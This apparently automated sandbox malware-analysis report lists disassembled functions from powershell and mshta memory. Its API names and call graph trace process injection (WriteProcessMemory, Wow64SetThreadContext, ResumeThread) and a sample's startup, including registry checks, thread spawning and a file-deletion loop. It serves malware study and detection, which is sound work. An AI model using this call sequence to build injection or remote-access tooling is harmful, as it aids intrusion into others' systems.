                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 5145e7dcc5bc3b7f1e34cc7633ac2b14b5ca72a36acba251236869e2915b88f5
                                                        • Instruction ID: 7672693f39c25a4daa88a193a29278f5370c751fde8a5befc1042e9189a6f785
                                                        • Opcode Fuzzy Hash: 5145e7dcc5bc3b7f1e34cc7633ac2b14b5ca72a36acba251236869e2915b88f5
                                                        • Instruction Fuzzy Hash: EB611470908A5D8FDB99DF58C884BE9BBF1FB69314F1041AED04DE3291DB74A985CB40
                                                        Function 000007FE899D53D8 Relevance: 1.7, APIs: 1, Instructions: 204injectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 320 7fe899d53d8-7fe899d7411 323 7fe899d7439-7fe899d74d2 WriteProcessMemory 320->323 324 7fe899d7413-7fe899d7436 320->324 325 7fe899d74da-7fe899d7536 323->325 326 7fe899d74d4 323->326 324->323 326->325
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457454458.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe899d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 49a8b648e4dcf35616d789b82985ccc1a0849b0d8b1d96c75535577ceb547c97
                                                        • Instruction ID: 57b3febb8af978b15b2370312f5c81ab4dc3c21e53eb2d6fca33343f9ccc81d0
                                                        • Opcode Fuzzy Hash: 49a8b648e4dcf35616d789b82985ccc1a0849b0d8b1d96c75535577ceb547c97
                                                        • Instruction Fuzzy Hash: 4E51E170908A5C8FDB98DF98C884BE9BBF1FB69314F1051AE904EE3251DB74A985CF44
                                                        Function 000007FE899D6E49 Relevance: 1.7, APIs: 1, Instructions: 188threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 328 7fe899d6e49-7fe899d6e55 329 7fe899d6e57-7fe899d6e5f 328->329 330 7fe899d6e60-7fe899d6f14 328->330 329->330 333 7fe899d6f36-7fe899d6f9f Wow64SetThreadContext 330->333 334 7fe899d6f16-7fe899d6f33 330->334 335 7fe899d6fa7-7fe899d6ff1 333->335 336 7fe899d6fa1 333->336 334->333 336->335
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457454458.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe899d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 0ac4719184552d51afcba550e27ee72584b3212c9fb7666c3e588179af1341b1
                                                        • Instruction ID: bbef150f0726723abc18cec4cab8d633f70156fb1688922384debaf94a264dd1
                                                        • Opcode Fuzzy Hash: 0ac4719184552d51afcba550e27ee72584b3212c9fb7666c3e588179af1341b1
                                                        • Instruction Fuzzy Hash: 7E517D70D08A8D8FDB55DF98C884BE9BBF1FB66310F10829AD048D7266D774A885CF40
                                                        Function 000007FE899D5398 Relevance: 1.7, APIs: 1, Instructions: 165threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 338 7fe899d5398-7fe899d6f14 341 7fe899d6f36-7fe899d6f9f Wow64SetThreadContext 338->341 342 7fe899d6f16-7fe899d6f33 338->342 343 7fe899d6fa7-7fe899d6ff1 341->343 344 7fe899d6fa1 341->344 342->341 344->343
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457454458.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe899d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: cbfba70240b16eeef935c5f61ed5cd181ce391d7a63bd38287cce97d453041cb
                                                        • Instruction ID: 5cbc83c0a3fcfda46642dc33c59e0e9ae33cf0c7f81cb205e9f50d8ec88718eb
                                                        • Opcode Fuzzy Hash: cbfba70240b16eeef935c5f61ed5cd181ce391d7a63bd38287cce97d453041cb
                                                        • Instruction Fuzzy Hash: 72512A70D08A4D8FDB94DF98C484BE9BBF1FB69311F10826AD009D3255D774A885CF80
                                                        Function 000007FE899D53B8 Relevance: 1.7, APIs: 1, Instructions: 165threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 346 7fe899d53b8-7fe899d6f14 349 7fe899d6f36-7fe899d6f9f Wow64SetThreadContext 346->349 350 7fe899d6f16-7fe899d6f33 346->350 351 7fe899d6fa7-7fe899d6ff1 349->351 352 7fe899d6fa1 349->352 350->349 352->351
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457454458.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe899d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 7bada5b66b3fd3b9a059000b75aa72516db12068d10f1fe1b6159b324ee13983
                                                        • Instruction ID: b14e554afe4a313d31b3408b50607d8a9350a51e8e94f5d8b60df6bc8e58c988
                                                        • Opcode Fuzzy Hash: 7bada5b66b3fd3b9a059000b75aa72516db12068d10f1fe1b6159b324ee13983
                                                        • Instruction Fuzzy Hash: 2A511A70D08A4D8FDB94DF99C484BE9BBF1FB69311F10826AD009D7255D774A985CF80
                                                        Function 000007FE899D7539 Relevance: 1.6, APIs: 1, Instructions: 138threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 384 7fe899d7539-7fe899d7545 385 7fe899d7547-7fe899d754f 384->385 386 7fe899d7550-7fe899d761a ResumeThread 384->386 385->386 389 7fe899d761c 386->389 390 7fe899d7622-7fe899d7660 386->390 389->390
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457454458.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe899d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 341329d9a141ffd082f0984f96ef9b8b1d9b53c2a820313da2a2c769be827f72
                                                        • Instruction ID: e5c5233f92c15c63cfe005d6761da13f0cfbe8f613b510ed43610d09b4e7caa7
                                                        • Opcode Fuzzy Hash: 341329d9a141ffd082f0984f96ef9b8b1d9b53c2a820313da2a2c769be827f72
                                                        • Instruction Fuzzy Hash: 96412A70D0874C8FDB59DF98D885BADBBB0EB5A310F14419ED049E72A2DA70A886CF51
                                                        Function 000007FE899D5408 Relevance: 1.6, APIs: 1, Instructions: 128threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 392 7fe899d5408-7fe899d761a ResumeThread 395 7fe899d761c 392->395 396 7fe899d7622-7fe899d7660 392->396 395->396
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457454458.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe899d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 5220bb602f19a5b721ed5dc67172246ba846147b0f826be3428eb1629da4f949
                                                        • Instruction ID: 70d19f92f533d174ac9f45398d6c23d26c5a58be199f89ae03b782b80440e912
                                                        • Opcode Fuzzy Hash: 5220bb602f19a5b721ed5dc67172246ba846147b0f826be3428eb1629da4f949
                                                        • Instruction Fuzzy Hash: D041F970E08A4C8FDB98DF98D885BADBBF0FB5A310F10515ED049E7251DA70A846CF51
                                                        Function 000007FE89AA2A8A Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 398 7fe89aa2a8a-7fe89aa2a98 399 7fe89aa2a9a-7fe89aa2ab4 398->399 400 7fe89aa2ad0-7fe89aa2ad9 398->400 406 7fe89aa2ab6-7fe89aa2ac1 399->406 407 7fe89aa2b00-7fe89aa2b0a 399->407 401 7fe89aa2adb-7fe89aa2ae8 400->401 402 7fe89aa2af2-7fe89aa2aff 400->402 401->402 404 7fe89aa2aea-7fe89aa2af0 401->404 404->402 411 7fe89aa2ac8-7fe89aa2ac9 406->411 409 7fe89aa2b19-7fe89aa2b29 407->409 410 7fe89aa2b0c-7fe89aa2b18 407->410 412 7fe89aa2b36-7fe89aa2b5c 409->412 413 7fe89aa2b2b-7fe89aa2b2f 409->413 411->400 413->412
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457609393.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe89aa0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: r68
                                                        • API String ID: 0-2565176026
                                                        • Opcode ID: b25f1933e2bbd7490abd8706cff9269624ae3acf0fec4f5a283a035f77528e4c
                                                        • Instruction ID: 8cb8a5bba4207002e09aa8bde475e9597c9cd0dd4525bc23deffe1bc80cc0490
                                                        • Opcode Fuzzy Hash: b25f1933e2bbd7490abd8706cff9269624ae3acf0fec4f5a283a035f77528e4c
                                                        • Instruction Fuzzy Hash: 96210531F0DA994FEBA5A72C68157F8B7D2EF59250F1802E7C44EC71A6DA18AC618390
                                                        Function 000007FE89AA2AB1 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 415 7fe89aa2ab1-7fe89aa2ac9 417 7fe89aa2ad0-7fe89aa2ad9 415->417 418 7fe89aa2adb-7fe89aa2ae8 417->418 419 7fe89aa2af2-7fe89aa2aff 417->419 418->419 420 7fe89aa2aea-7fe89aa2af0 418->420 420->419
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457609393.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe89aa0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: r68
                                                        • API String ID: 0-2565176026
                                                        • Opcode ID: f1271f810f373b187209e0acc951a9bc91442d10a466bd094d60d1648933966d
                                                        • Instruction ID: dc6f544ead2c210b09169f1e6633b11755e2ac768767c9344db7b63225214638
                                                        • Opcode Fuzzy Hash: f1271f810f373b187209e0acc951a9bc91442d10a466bd094d60d1648933966d
                                                        • Instruction Fuzzy Hash: 41F0AE31E1D99D0FF7A5A33C24152F47AD1EF55150F1501E6C49ED7263D9145C658380
                                                        Function 000007FE89AA2444 Relevance: .2, Instructions: 209COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 422 7fe89aa2444-7fe89aa245a 423 7fe89aa245c-7fe89aa2469 422->423 424 7fe89aa2473-7fe89aa2478 422->424 423->424 427 7fe89aa246b-7fe89aa2471 423->427 425 7fe89aa247e-7fe89aa2481 424->425 426 7fe89aa2593-7fe89aa259d 424->426 430 7fe89aa2498 425->430 431 7fe89aa2483-7fe89aa2496 425->431 428 7fe89aa259f-7fe89aa25ad 426->428 429 7fe89aa25ae-7fe89aa25be 426->429 427->424 433 7fe89aa25cb-7fe89aa25f7 429->433 434 7fe89aa25c0-7fe89aa25c4 429->434 435 7fe89aa249a-7fe89aa249c 430->435 431->435 434->433 435->426 436 7fe89aa24a2-7fe89aa24a5 435->436 437 7fe89aa24a7-7fe89aa24ba 436->437 438 7fe89aa24bc 436->438 440 7fe89aa24be-7fe89aa24c0 437->440 438->440 440->426 441 7fe89aa24c6-7fe89aa24c9 440->441 442 7fe89aa24cb-7fe89aa24de 441->442 443 7fe89aa24e0 441->443 444 7fe89aa24e2-7fe89aa24e4 442->444 443->444 444->426 445 7fe89aa24ea-7fe89aa24f0 444->445 446 7fe89aa250c-7fe89aa2519 445->446 447 7fe89aa24f2-7fe89aa24ff 445->447 449 7fe89aa252d-7fe89aa253d 446->449 450 7fe89aa251b-7fe89aa2526 446->450 447->446 448 7fe89aa2501-7fe89aa250a 447->448 448->446 451 7fe89aa2551-7fe89aa255a 449->451 452 7fe89aa253f-7fe89aa254a 449->452 450->449 454 7fe89aa2561-7fe89aa256a 451->454 452->451 455 7fe89aa256c-7fe89aa2579 454->455 456 7fe89aa2583-7fe89aa2592 454->456 455->456 457 7fe89aa257b-7fe89aa2581 455->457 457->456
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457609393.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe89aa0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 80cd96888e2334b9aa23b3b3297820eec0f5fcac9ba23a6d339a8b494ff337e6
                                                        • Instruction ID: 80216e422f783361d75058fb20aa28e76ddd420afd7efb5f4df071c3862ba621
                                                        • Opcode Fuzzy Hash: 80cd96888e2334b9aa23b3b3297820eec0f5fcac9ba23a6d339a8b494ff337e6
                                                        • Instruction Fuzzy Hash: 52515B31E2DB874FE75A932C58607B87BD1FF45654F2811FEC88EC71A2D624AC618340

                                                        Executed Functions

                                                        Function 03400FC1 Relevance: .0, Instructions: 5COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000003.449696587.0000000003400000.00000010.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_3_3400000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction ID: 9cdd50c2bbb88692d56e9e0c74983d66fa45a57c97d4bc18964ac6f8475e1817
                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction Fuzzy Hash:
                                                        Function 03400FB1 Relevance: .0, Instructions: 5COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000003.449696587.0000000003400000.00000010.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_3_3400000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction ID: 9cdd50c2bbb88692d56e9e0c74983d66fa45a57c97d4bc18964ac6f8475e1817
                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction Fuzzy Hash:
                                                        Function 03400FB9 Relevance: .0, Instructions: 5COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000003.449696587.0000000003400000.00000010.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_3_3400000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction ID: 9cdd50c2bbb88692d56e9e0c74983d66fa45a57c97d4bc18964ac6f8475e1817
                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction Fuzzy Hash:

                                                        Execution Graph

                                                        Execution Coverage:1.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:3.5%
                                                        Total number of Nodes:716
                                                        Total number of Limit Nodes:12
                                                        execution_graph 46872 434906 46877 434bd8 SetUnhandledExceptionFilter 46872->46877 46874 43490b pre_c_initialization 46878 4455cc 20 API calls 2 library calls 46874->46878 46876 434916 46877->46874 46878->46876 46879 404e26 WaitForSingleObject 46880 404e40 SetEvent CloseHandle 46879->46880 46881 404e57 closesocket 46879->46881 46882 404ed8 46880->46882 46883 404e64 46881->46883 46884 404e7a 46883->46884 46892 4050e4 83 API calls 46883->46892 46886 404e8c WaitForSingleObject 46884->46886 46887 404ece SetEvent CloseHandle 46884->46887 46893 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46886->46893 46887->46882 46889 404e9b SetEvent WaitForSingleObject 46894 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46889->46894 46891 404eb3 SetEvent CloseHandle CloseHandle 46891->46887 46892->46884 46893->46889 46894->46891 46895 44839e 46903 448790 46895->46903 46898 4483b2 46900 4483ba 46901 4483c7 46900->46901 46911 4483ca 11 API calls 46900->46911 46912 44854a 46903->46912 46906 4487cf TlsAlloc 46907 4487c0 46906->46907 46919 43502b 46907->46919 46909 4483a8 46909->46898 46910 448319 20 API calls 3 library calls 46909->46910 46910->46900 46911->46898 46913 44857a 46912->46913 46916 448576 46912->46916 46913->46906 46913->46907 46914 44859a 46914->46913 46917 4485a6 GetProcAddress 46914->46917 46916->46913 46916->46914 46926 4485e6 46916->46926 46918 4485b6 __crt_fast_encode_pointer 46917->46918 46918->46913 46920 435036 IsProcessorFeaturePresent 46919->46920 46921 435034 46919->46921 46923 435078 46920->46923 46921->46909 46933 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46923->46933 46925 43515b 46925->46909 46927 448607 LoadLibraryExW 46926->46927 46928 4485fc 46926->46928 46929 448624 GetLastError 46927->46929 46932 44863c 46927->46932 46928->46916 46930 44862f LoadLibraryExW 46929->46930 46929->46932 46930->46932 46931 448653 FreeLibrary 46931->46928 46932->46928 46932->46931 46933->46925 46934 434918 46935 434924 CallCatchBlock 46934->46935 46960 434627 46935->46960 46938 43492b 46939 434954 46938->46939 47263 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46938->47263 46947 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46939->46947 46971 4442d2 46939->46971 46943 434973 CallCatchBlock 46944 4349f3 46979 434ba5 46944->46979 46947->46944 47264 443487 35 API calls 4 library calls 46947->47264 46955 434a1f 46957 434a28 46955->46957 47265 443462 28 API calls _abort 46955->47265 47266 43479e 13 API calls 2 library calls 46957->47266 46961 434630 46960->46961 47267 434cb6 IsProcessorFeaturePresent 46961->47267 46963 43463c 47268 438fb1 46963->47268 46965 434641 46966 434645 46965->46966 47277 44415f 46965->47277 46966->46938 46969 43465c 46969->46938 46972 4442e9 46971->46972 46973 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 46972->46973 46974 43496d 46973->46974 46974->46943 46975 444276 46974->46975 46976 4442a5 46975->46976 46977 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 46976->46977 46978 4442ce 46977->46978 46978->46947 47327 436f10 46979->47327 46982 4349f9 46983 444223 46982->46983 47329 44f0d9 46983->47329 46985 44422c 46986 434a02 46985->46986 47333 446895 35 API calls 46985->47333 46988 40ea00 46986->46988 47504 41cbe1 LoadLibraryA GetProcAddress 46988->47504 46990 40ea1c GetModuleFileNameW 47509 40f3fe 46990->47509 46992 40ea38 47524 4020f6 46992->47524 46995 4020f6 28 API calls 46996 40ea56 46995->46996 47530 41beac 46996->47530 47000 40ea68 47556 401e8d 47000->47556 47002 40ea71 47003 40ea84 47002->47003 47004 40eace 47002->47004 47586 40fbee 116 API calls 47003->47586 47562 401e65 22 API calls 47004->47562 47007 40eade 47563 401e65 22 API calls 47007->47563 47008 40ea96 47587 401e65 22 API calls 47008->47587 47010 40eaa2 47588 410f72 36 API calls __EH_prolog 47010->47588 47012 40eafd 47564 40531e 28 API calls 47012->47564 47015 40eb0c 47565 406383 28 API calls 47015->47565 47016 40eab4 47589 40fb9f 77 API calls 47016->47589 47019 40eabd 47590 40f3eb 70 API calls 47019->47590 47020 40eb18 47566 401fe2 47020->47566 47026 401fd8 11 API calls 47028 40ef36 47026->47028 47027 401fd8 11 API calls 47029 40eb36 47027->47029 47258 443396 GetModuleHandleW 47028->47258 47578 401e65 22 API calls 47029->47578 47031 40eb3f 47579 401fc0 28 API calls 47031->47579 47033 40eb4a 47580 401e65 22 API calls 47033->47580 47035 40eb63 47581 401e65 22 API calls 47035->47581 47037 40eb7e 47038 40ebe9 47037->47038 47591 406c59 28 API calls 47037->47591 47582 401e65 22 API calls 47038->47582 47041 40ebab 47042 401fe2 28 API calls 47041->47042 47043 40ebb7 47042->47043 47046 401fd8 11 API calls 47043->47046 47044 40ebf6 47045 40ec3d 47044->47045 47593 413584 RegOpenKeyExA RegQueryValueExA RegCloseKey 47044->47593 47583 40d0a4 47045->47583 47047 40ebc0 47046->47047 47592 413584 RegOpenKeyExA RegQueryValueExA RegCloseKey 47047->47592 47049 40ec43 47051 40eac6 47049->47051 47595 41b354 33 API calls 47049->47595 47051->47026 47054 40ebdf 47054->47038 47056 40f38a 47054->47056 47055 40ec5e 47058 40ecb1 47055->47058 47596 407751 RegOpenKeyExA RegQueryValueExA RegCloseKey 47055->47596 47678 4139e4 30 API calls 47056->47678 47057 40ec21 47057->47045 47594 4139e4 30 API calls 47057->47594 47601 401e65 22 API calls 47058->47601 47063 40f3a0 47679 4124b0 65 API calls ___scrt_fastfail 47063->47679 47064 40ecba 47072 40ecc6 47064->47072 47073 40eccb 47064->47073 47065 40ec79 47067 40ec87 47065->47067 47068 40ec7d 47065->47068 47599 401e65 22 API calls 47067->47599 47597 407773 30 API calls 47068->47597 47602 407790 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47072->47602 47603 401e65 22 API calls 47073->47603 47074 40ec82 47598 40729b 97 API calls 47074->47598 47078 40f3ba 47681 413a5e RegOpenKeyExW RegDeleteValueW 47078->47681 47079 40ecd4 47604 41bcef 28 API calls 47079->47604 47081 40ec90 47081->47058 47085 40ecac 47081->47085 47082 40ecdf 47605 401f13 28 API calls 47082->47605 47600 40729b 97 API calls 47085->47600 47086 40f3cd 47682 401f09 11 API calls 47086->47682 47087 40ecea 47606 401f09 11 API calls 47087->47606 47091 40f3d7 47683 401f09 11 API calls 47091->47683 47092 40ecf3 47607 401e65 22 API calls 47092->47607 47095 40f3e0 47684 40dd7d 27 API calls 47095->47684 47096 40ecfc 47608 401e65 22 API calls 47096->47608 47098 40f3e5 47685 414f65 167 API calls 47098->47685 47102 40ed16 47609 401e65 22 API calls 47102->47609 47104 40ed30 47610 401e65 22 API calls 47104->47610 47106 40ed49 47107 40edbb 47106->47107 47611 401e65 22 API calls 47106->47611 47108 40edc5 47107->47108 47113 40ef41 ___scrt_fastfail 47107->47113 47110 40edce 47108->47110 47116 40ee4a 47108->47116 47617 401e65 22 API calls 47110->47617 47112 40edd7 47618 401e65 22 API calls 47112->47618 47628 413733 RegOpenKeyExA RegQueryValueExA RegCloseKey 47113->47628 47114 40ed5e _wcslen 47114->47107 47612 401e65 22 API calls 47114->47612 47140 40ee45 ___scrt_fastfail 47116->47140 47118 40ede9 47619 401e65 22 API calls 47118->47619 47119 40ed79 47613 401e65 22 API calls 47119->47613 47123 40edfb 47620 401e65 22 API calls 47123->47620 47124 40ed8e 47614 40da6f 31 API calls 47124->47614 47125 40ef8c 47629 401e65 22 API calls 47125->47629 47128 40ee24 47621 401e65 22 API calls 47128->47621 47129 40efb1 47630 402093 28 API calls 47129->47630 47131 40eda1 47615 401f13 28 API calls 47131->47615 47135 40edad 47616 401f09 11 API calls 47135->47616 47136 40ee35 47622 40ce34 45 API calls _wcslen 47136->47622 47137 40efc3 47631 4137aa 14 API calls 47137->47631 47139 40edb6 47139->47107 47140->47116 47623 413982 31 API calls 47140->47623 47144 40eede ctype 47624 401e65 22 API calls 47144->47624 47145 40efd9 47632 401e65 22 API calls 47145->47632 47147 40efe5 47633 43bb2c 39 API calls _swprintf 47147->47633 47150 40eff2 47152 40f01f 47150->47152 47634 41ce2c 86 API calls ___scrt_fastfail 47150->47634 47151 40eef5 47151->47125 47625 401e65 22 API calls 47151->47625 47635 402093 28 API calls 47152->47635 47155 40ef12 47626 41bcef 28 API calls 47155->47626 47156 40f003 CreateThread 47156->47152 47793 41d4ee 10 API calls 47156->47793 47159 40f034 47636 402093 28 API calls 47159->47636 47160 40ef1e 47627 40f4af 103 API calls 47160->47627 47163 40f043 47637 41b580 79 API calls 47163->47637 47164 40ef23 47164->47125 47165 40ef2a 47164->47165 47165->47051 47167 40f048 47638 401e65 22 API calls 47167->47638 47169 40f054 47639 401e65 22 API calls 47169->47639 47171 40f066 47640 401e65 22 API calls 47171->47640 47173 40f086 47641 43bb2c 39 API calls _swprintf 47173->47641 47175 40f093 47642 401e65 22 API calls 47175->47642 47177 40f09e 47643 401e65 22 API calls 47177->47643 47179 40f0af 47644 401e65 22 API calls 47179->47644 47181 40f0c4 47645 401e65 22 API calls 47181->47645 47183 40f0d5 47184 40f0dc StrToIntA 47183->47184 47646 409e1f 169 API calls _wcslen 47184->47646 47186 40f0ee 47647 401e65 22 API calls 47186->47647 47188 40f0f7 47189 40f13c 47188->47189 47648 43455e 47188->47648 47656 401e65 22 API calls 47189->47656 47194 40f11f 47197 40f126 CreateThread 47194->47197 47195 40f194 47658 401e65 22 API calls 47195->47658 47196 40f14c 47196->47195 47198 43455e new 22 API calls 47196->47198 47197->47189 47797 41a045 102 API calls __EH_prolog 47197->47797 47200 40f161 47198->47200 47657 401e65 22 API calls 47200->47657 47202 40f173 47205 40f17a CreateThread 47202->47205 47203 40f207 47664 401e65 22 API calls 47203->47664 47204 40f19d 47204->47203 47659 401e65 22 API calls 47204->47659 47205->47195 47794 41a045 102 API calls __EH_prolog 47205->47794 47208 40f1b9 47660 401e65 22 API calls 47208->47660 47209 40f255 47669 41b69e 79 API calls 47209->47669 47210 40f210 47210->47209 47665 401e65 22 API calls 47210->47665 47213 40f1ce 47661 40da23 31 API calls 47213->47661 47215 40f25e 47670 401f13 28 API calls 47215->47670 47216 40f225 47666 401e65 22 API calls 47216->47666 47218 40f269 47671 401f09 11 API calls 47218->47671 47222 40f1e1 47662 401f13 28 API calls 47222->47662 47223 40f272 CreateThread 47228 40f293 CreateThread 47223->47228 47229 40f29f 47223->47229 47795 40f7e2 120 API calls 47223->47795 47224 40f23a 47667 43bb2c 39 API calls _swprintf 47224->47667 47227 40f1ed 47663 401f09 11 API calls 47227->47663 47228->47229 47796 412132 137 API calls 47228->47796 47231 40f2b4 47229->47231 47232 40f2a8 CreateThread 47229->47232 47236 40f307 47231->47236 47672 402093 28 API calls 47231->47672 47232->47231 47791 412716 38 API calls ___scrt_fastfail 47232->47791 47234 40f1f6 CreateThread 47234->47203 47792 401be9 49 API calls 47234->47792 47235 40f247 47668 40c19d 7 API calls 47235->47668 47674 41353a RegOpenKeyExA RegQueryValueExA RegCloseKey 47236->47674 47239 40f2d7 47673 4052fd 28 API calls 47239->47673 47243 40f31f 47243->47095 47675 41bcef 28 API calls 47243->47675 47247 40f338 47676 413656 31 API calls 47247->47676 47252 40f34e 47677 401f09 11 API calls 47252->47677 47254 40f381 DeleteFileW 47255 40f388 47254->47255 47256 40f359 47254->47256 47680 41bcef 28 API calls 47255->47680 47256->47254 47256->47255 47257 40f36f Sleep 47256->47257 47257->47256 47259 434a15 47258->47259 47259->46955 47260 4434bf 47259->47260 47799 44323c 47260->47799 47263->46938 47264->46944 47265->46957 47266->46943 47267->46963 47269 438fb6 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 47268->47269 47281 43a4ba 47269->47281 47272 438fc4 47272->46965 47274 438fcc 47275 438fd7 47274->47275 47295 43a4f6 DeleteCriticalSection 47274->47295 47275->46965 47323 44fbe8 47277->47323 47280 438fda 8 API calls 3 library calls 47280->46966 47282 43a4c3 47281->47282 47284 43a4ec 47282->47284 47286 438fc0 47282->47286 47296 438eff 47282->47296 47301 43a4f6 DeleteCriticalSection 47284->47301 47286->47272 47287 43a46c 47286->47287 47316 438e14 47287->47316 47289 43a476 47290 43a481 47289->47290 47321 438ec2 6 API calls try_get_function 47289->47321 47290->47274 47292 43a48f 47293 43a49c 47292->47293 47322 43a49f 6 API calls ___vcrt_FlsFree 47292->47322 47293->47274 